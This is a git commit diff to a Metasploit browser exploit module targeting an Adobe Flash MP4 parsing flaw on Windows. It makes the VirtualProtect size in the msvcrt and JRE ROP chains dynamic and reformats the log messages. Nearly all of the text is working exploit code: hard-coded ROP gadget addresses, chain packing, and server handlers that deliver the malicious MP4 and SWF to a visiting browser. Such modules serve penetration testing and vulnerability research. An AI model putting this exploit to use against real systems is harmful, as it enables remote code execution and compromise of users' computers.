Dynamic VirtualProtect dwSize. Change output style.

2012-03-11 13:49:46 -05:00 · 2012-03-11 13:49:46 -05:00 · 25a1552fbd
parent de888e50f0
commit 25a1552fbd
1 changed files with 13 additions and 11 deletions
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Both ROP chains generated by mona.py - See corelan.be
 		case t['Rop']
 		when :msvcrt
-			print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
+			exec_size = code.length
 			rop =
 			[
 				0x77c4e392,  # POP EAX # RETN
@ -146,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x77c4ec00,  # POP EBP # RETN
 				0x77c35459,  # ptr to 'push esp #  ret'
 				0x77c47705,  # POP EBX # RETN
-				0x00000800,  # <- change size to mark as executable if needed (-> ebx)
+				exec_size,   # EBX
 				0x77c3ea01,  # POP ECX # RETN
 				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
 				0x77c46100,  # POP EDI # RETN 
@ -154,16 +155,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x77c4d680,  # POP EDX # RETN
 				0x00000040,  # newProtect (0x40) (-> edx)
 				0x77c4e392,  # POP EAX # RETN
-				nop,  # NOPS (-> eax)
+				nop,         # NOPS (-> eax)
 				0x77c12df9,  # PUSHAD # RETN
 			].pack("V*")

 		when :jre
-			print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
+			exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
 			rop =
 			[
 				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				0xfffffdff,  # Value to negate, will become 0x00000201 (dwSize)
+				exec_size,   # Value to negate, will become 0x00000201 (dwSize)
 				0x7c347f98,  # RETN (ROP NOP)
 				0x7c3415a2,  # JMP [EAX]
 				0xffffffff,
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote

 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
-			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
+			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
 			send_not_found(cli)
 			return
 		end

-		print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
+		print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")

 		# The SWF requests our MP4 trigger
 		if request.uri =~ /\.mp4$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
 			mp4 = create_mp4(my_target)
 			send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
 			return
 		end

 		if request.uri =~ /\.swf$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
 			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
 			return
 		end
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
 		end

 		add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
-		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
+		print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
 		send_response(cli, html, {'Content-Type'=>'text/html'})
 	end